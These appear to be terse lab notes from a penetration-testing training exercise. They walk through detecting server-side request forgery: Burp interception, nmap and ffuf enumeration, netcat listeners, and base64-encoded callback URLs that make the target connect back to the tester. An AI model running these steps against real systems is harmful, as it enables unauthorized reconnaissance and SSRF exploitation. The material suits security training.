root@oco:~$ nc -nlvp 8080
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://{attackerIP:port}&date=2024-01-02
- SSRF can be validated if the URL can be changed to point to another URL;
if the response reports no error, then there is an SSRF vulnerability
- changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
will test whether the web application responds w/o error
- this method also tests whether the SSRF vulnerability is blind or something else
Response
...
HTTP 200 OK
root@oco:~$ ...Netcat connection
connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
GET /index.php HTTP/1.1
Host: 172.17.0.1:8000
Accept: */*
root@oco:~$ sudo nmap -sC -sV -T4 10.129.202.133 -p-
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3001/tcp open http PHP cli server 5.5 or later
|_http-title: Login
3002/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title.
3003/tcp open http PHP cli server 5.5 or later (PHP 7.4.3)
root@oco:~$ sudo nmap --script=vuln -T4 10.129.202.133 -p 3000-3003
PORT STATE SERVICE
3000/tcp open ppp
3001/tcp open nessus
3002/tcp open exlm-agent
3003/tcp open cgms
root@oco:~$ find / -iname directory-list*
/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://{targetSite.tld}:{port}/FUZZ -t 100 -ic
api [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 14ms]
API [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 9ms]
* -w specifies the wordlist
* -u specifies the url
* -t increases the number of threads
* -ic removes commented lines from the file
- ignore wordlist comments (default: false)
root@oco:~$ curl http://10.129.202.133:3000/api
{"status":"UP"}
* try this on Kibana
#perform API endpoint fuzzing common-api-endpoints-mazen160.txt list
root@oco:~$ find / -iname common-api* 2>/dev/null
/usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt .
root@oco:~$ ffuf -w common-api-endpoints-mazen160.txt -u 'http://{targetSite:port}/api/FUZZ' -t 100 -ic
download [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]
userinfo [Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 27ms]
root@oco:~$ curl 'http://10.129.156.72:3000/api/userinfo'
{"success":false,"error":"'id' parameter is not given."}
root@oco:~$ ifconfig
...
10.10.14.35
root@oco:~$ nc -nlvp 4444
listening on [any] 4444 ...
root@oco:~$ curl "http://{targetSite:port}/api/userinfo?id=http://{attackerIP}:{port}"
{"success":false,"error":"'id' parameter is invalid."}
* if an error is received, base64 encode the payload
#encode the payload
root@oco:~$ echo -n "http://10.10.14.35:4444" | base64
aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ=
#identify the parameter via ffuf
root@oco:~$ ...
root@oco:~$ curl "http://10.129.156.72:3000/api/userinfo?id=aHR0cDovLzEwLjEwLjE0LjM1OjQ0NDQ="
...
listening on [any] 4444 ...
connect to [<VPN/TUN Adapter IP>] from (UNKNOWN) [<TARGET IP>] 50542
GET / HTTP/1.1
Accept: application/json, text/plain, */*
User-Agent: axios/0.24.0
Host: <VPN/TUN Adapter IP>:4444
Connection: close
* although the connection was closed, it shows that the target is vulnerable to SSRF
